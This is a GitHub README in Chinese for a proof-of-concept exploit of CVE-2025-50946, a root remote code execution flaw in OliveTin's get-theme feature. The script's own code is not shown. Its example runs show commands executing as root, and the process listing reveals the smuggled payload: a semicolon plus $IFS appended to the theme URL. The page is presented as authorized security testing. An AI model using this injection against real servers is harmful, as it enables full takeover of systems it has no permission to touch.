runt1me/cve-2025-50946
GitHub: runt1me/cve-2025-50946
针对 OliveTin get-theme 远程代码执行漏洞(CVE-2025-50946)的 Python 漏洞利用脚本,用于在授权测试中验证该漏洞的可利用性。
Stars: 0 | Forks: 0
# cve-2025-50946
CVE-2025-50946(OliveTin get-theme RCE)的漏洞利用脚本。其对字符的要求非常苛刻,许多包含多个参数的命令可能无法正确执行。我还没花时间去深究根本原因或尝试让脚本变得更健壮。如果你有需求,请随时联系我或提交一个 PR。
感谢 [chrisWalker11](https://github.com/chrisWalker11) 提供了我编写此脚本所依据的原始研究:[链接](https://github.com/chrisWalker11/Cves/blob/main/CVE-2025-50946/CVE-2025-50946.md)
# 示例用法
基础 PoC:
```
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
```
进程列表(仅展示部分输出):
```
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH
```
标签:Go语言工具, PoC, Python, 威胁模拟, 无后门, 暴力破解, 远程命令执行, 逆向工具